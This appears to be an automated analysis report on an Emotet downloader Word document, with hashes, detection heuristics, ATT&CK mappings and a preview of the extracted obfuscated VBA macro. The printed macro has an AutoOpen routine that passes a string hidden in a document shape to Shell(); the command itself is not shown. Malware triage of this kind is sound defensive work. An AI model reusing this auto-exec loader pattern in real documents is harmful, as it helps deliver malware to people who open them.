Emotet Office (OLE) malware analysis — malicious · 4bacae6838115916

MALICIOUS

Office (OLE)

81.2 KB Created: 2018-11-15 12:20:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 871dd28c7e2f037579dabf8e083d23fd SHA-1: e48c71e452f203b0c43e116d6d5cbddc9b3c1c85 SHA-256: 4bacae6838115916aafe7077a78e68a4f0804f4ba7a98731069cab75c3b0d1d3

252 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the use of the Shell() function within VBA macros. This function is used to execute external commands, specifically 'cmd.exe' with a complex, obfuscated command string. This command string appears to construct and execute a URL, likely to download and run a secondary payload. The ClamAV detection explicitly names this as 'Doc.Downloader.Emotet-6751431-0', strongly suggesting the Emotet family.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-6751431-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6751431-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

            "Rw", "G", "B", "u", "v", "kL", "i", "At")
OqdAwPt = Shell(wTHlWKDVv + bftHwz + ODwRJ, VOHCfK)
   ZrfcYYQT = Array("qC", "Wf", "M", "DS", "B", "Ur", "v", "a", _

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

End Function
Sub AutoOpen()
   pWXpYBq = Array("Fv", "ti", "z", "YJ", "Z", "n", "W", "iM", _

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6759 bytes
SHA-256: `a13cb23e85641648ec7113b688369b1c3266328702d036f5b511be654a0c648b`
Detection ClamAV: No threats found Obfuscation or payload: likely 19 of 38 identifiers look randomly generated (e.g. 'mjSjvKifLHZ') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "mjSjvKifLHZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function KJBwVhs() nCFNWd = Array("z", "MY", "Un", "K", "M", "oj", "iv", "sF", _ "L", "Zn", "q", "wQ", "C", "cp", "Mb", "P", _ "u", "Ip", "Kk", "X", "i", "YG", "Km", "Sd", _ "It", "K", "Mu", "RU", "cl", "U", "kL", "G", _ "YG", "YX", "D", "a", "kl", "lz", "f", "zp", _ "F", "wB", "wR", "BZ", "X", "k", "Ql", "q", _ "Zr", "wq", "V", "V", "a", "R", "S", "m", _ "k", "m", "YR", "O", "BL", "tR", "w", "OK") Const VOHCfK = 528734322 - 528734322 LsiAHVbfM = Array("MA", "hK", "wX", "G", "S", "ju", "j", "YJ", _ "IJ", "hQ", "f", "X", "wN", "d", "E", "K", _ "Xw", "is", "Cv", "H", "hH", "p", "q", "Au", _ "QL", "dF", "X", "W", "ji", "mv", "bw", "OV", _ "E", "vr", "d", "h", "z", "O", "k", "Fm", _ "iq", "LI", "cR", "YP", "Nf", "q", "H", "Ot", _ "fo", "hS", "f", "s", "L", "ki", "ta", "Ot", _ "BR", "m", "EQ", "jX", "v", "Lu", "b", "Nl") XjXnjACWC = Array("v", "L", "LD", "hW", "sM", "w", "W", "lw", _ "M", "O", "c", "Zk", "O", "lz", "cR", "v", _ "M", "SP", "DL", "Y", "J", "Q", "m", "i", _ "DR", "i", "O", "w", "O", "W", "Ju", "l", _ "uw", "EQ", "B", "J", "i", "K", "uf", "d", _ "iX", "I", "wz", "C", "z", "u", "wN", "zw", _ "I", "qF", "Q", "DT", "SA", "j", "Q", "oL", _ "T", "w", "Jp", "cM", "Ij", "c", "Fj", "FL") nsGvwYiB = Array("j", "jq", "m", "M", "u", "i", "NL", "uY", _ "j", "UU", "bI", "VJ", "L", "Dl", "u", "cm", _ "t", "c", "b", "N", "vE", "A", "V", "O", _ "B", "J", "i", "E", "Zb", "GQ", "Sm", "nM", _ "EG", "v", "aF", "L", "i", "s", "qN", "KK", _ "Y", "Bb", "Y", "Gk", "U", "LW", "v", "NQ", _ "z", "YM", "cN", "GF", "l", "rT", "E", "XW", _ "wU", "sA", "W", "vX", "u", "X", "I", "iv") wTHlWKDVv = "" + aGzwOiiX + qiEiCvMc + Shapes("aiDXihqGj").TextFrame.ContainingRange + pTmpozzj + zEZKYiJ zJUCTfXU = Array("wl", "P", "H", "wd", "cw", "b", "DP", "mN", _ "RE", "v", "U", "d", "A", "QP", "Iu", "K", _ "V", "oT", "l", "hn", "EE", "Hp", "jT", "r", _ "UU", "vu", "Cf", "J", "P", "sv", "lz", "f", _ "bf", "wv", "Z", "b", "tT", "A", "L", "G", _ "d", "P", "Do", "P", "Ev", "K", "A", "pj", _ "zY", "Rw", "Hw", "r", "Q", "t", "C", "Lp", _ "Hv", "fJ", "Hj", "N", "h", "ZH", "Bk", "G") opQQX = Array("R", "z", "JI", "Zz", "h", "kW", "Q", "h", _ "n", "z", "p", "w", "v", "YY", "l", "oF", _ "ms", "k", "K", "nI", "zt", "R", "Aj", "Sp", _ "S", "r", "iY", "LA", "hF", "lo", "D", "o", _ "BH", "R", "S", "p", "B", "WQ", "Tf", "B", _ "mK", "Hk", "o", "fu", "jf", "FI", "z", "jP", _ "q", "zB", "p", "S", "f", "j", "Y", "A", _ "zN", "b", "XV", "r", "U", "f", "VL", "T") fXCUn = Array("Bv", "fI", "p", "q", "lI", "mS", "us", "L", _ "v", "i", "w", "o", "a", "z", "bT", "s", _ "oi", "Rz", "S", "Pp", "kc", "J", "YG", "GH", _ "s", "M", "N", "ZM", "P", "w", "c", "qv", _ "Pf", "hC", "z", "n", "C", "L", "rb", "iF", _ "ti", "D", "W", "jG", "Ai", "t", "bj", "w", _ "TK", "SJ", "D", "E", "ns", "MD", "Md", "j", _ "Rw", "G", "B", "u", "v", "kL", "i", "At") OqdAwPt = Shell(wTHlWKDVv + bftHwz + ODwRJ, VOHCfK) ZrfcYYQT = Array("qC", "Wf", "M", "DS", "B", "Ur", "v", "a", _ "aN", "t", "kt", "U", "iU", "R", "OG", "wi", _ "ai", "d", "kX", "Lc", "q", "Y", "ij", "uO", _ "c", "n", "rX", "d", "Q", "s", "A", "LQ", _ "A", "W", "H", "i", "sU", "Wz", "T", "zK", _ "z", "MA", "z", "w", "XY", "SS", "u", "jT", _ "V", "F", "Bt", "SJ", "N", "Y", "SY", "WM", _ "v", "j", "T", "RD", "Kb", "d", "Cz", "hw") WDUACTBDr = Array("z", "MQ", "H", "mn", "oX", "BT", "f", "jV", _ "S", "AB", "Jo", "Zf", "L", "W", "d", "Fa", _ "A", "K", "z", "S", "jo", "W", "L", "CL", _ "F", "tn", "v", "L", "iL", "rh", "G", "G", _ "q", "d", "HS", "Rt", "pr", "R", "A", "VM", _ "Pl", "nn", "n", "jQ", "K", "k", "M", "Hm", _ "d", "fV", "nG", "Sh", "ko", "C", "P", "Cl", _ "ok", "bf", "U", "NZ", "j", "Tk", "R", "AO") End Function Sub AutoOpen() pWXpYBq = Array("Fv", "ti", "z", "YJ", "Z", "n", "W", "iM", _ "sP", "r", "rC", "AF", "An", "wC", "t", "Z", _ "H", "K", "Z", "C", "A", "q", "vi", "qE", _ "n", "O", "Th", "m", "oK", "v", "n", "lz", _ "XM", "A", "zE", "Ls", "JM", "m", "Xq", "w", _ "Fn", "Nz", "Fj", "E", "qu", "uP", "n", "Ov", _ "t", "fz", "I", "Q", "c", "T", "Y", "mb", _ "z", "J", "BS", "Y", "VW", "K", "jC", "Ji") KJBwVhs fWWvfEqH = Array("T", "zr", "J", "FM", "UX", "ho", "v", "m", _ "s", "v", "q", "hE", "Wt", "bb", "B", "i", _ "wG", "H", "oQ", "ph", "k", "EB", "T", "qA", _ "b", "Up", "mw", "V", "KQ", "oA", "s", "Ta", _ "s", "N", "Cc", "Q", "IX", "bW", "z", "A", _ "T", "U", "MT", "Q", "m", "wW", "w", "JG", _ "v", "W", "c", "nm", "R", "Za", "SH", "Y", _ "AS", "MY", "SL", "E", "mP", "OE", "zE", "PY") UwQfHNw = Array("J", "hV", "K", "S", "wH", "AL", "f", "IR", _ "pv", "Sc", "lK", "Qt", "dh", "hO", "wF", "jJ", _ "t", "W", "d", "mw", "zi", "w", "t", "Y", _ "X", "Cd", "Sh", "RP", "L", "G", "jZ", "d", _ "hJ", "vh", "DQ", "zj", "jd", "b", "Q", "Db", _ "TW", "kp", "b", "q", "hw", "OD", "v", "P", _ "D", "f", "f", "uL", "J", "ZA", "pI", "z", _ "ip", "I", "Dk", "z", "I", "H", "Ko", "q") vlwtTPhm = Array("d", "u", "Td", "i", "zM", "Hr", "jD", "sj", _ "hK", "z", "q", "ft", "ij", "S", "rz", "J", _ "OI", "Qr", "uC", "Q", "pD", "v", "Zf", "n", _ "C", "Ri", "D", "T", "FO", "Gj", "K", "H", _ "wk", "d", "sc", "Xi", "S", "W", "L", "i", _ "hk", "i", "K", "G", "fV", "UX", "q", "jN", _ "l", "MB", "Zn", "M", "VI", "Ta", "aB", "S", _ "m", "LB", "zv", "fl", "DN", "z", "U", "sX") End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.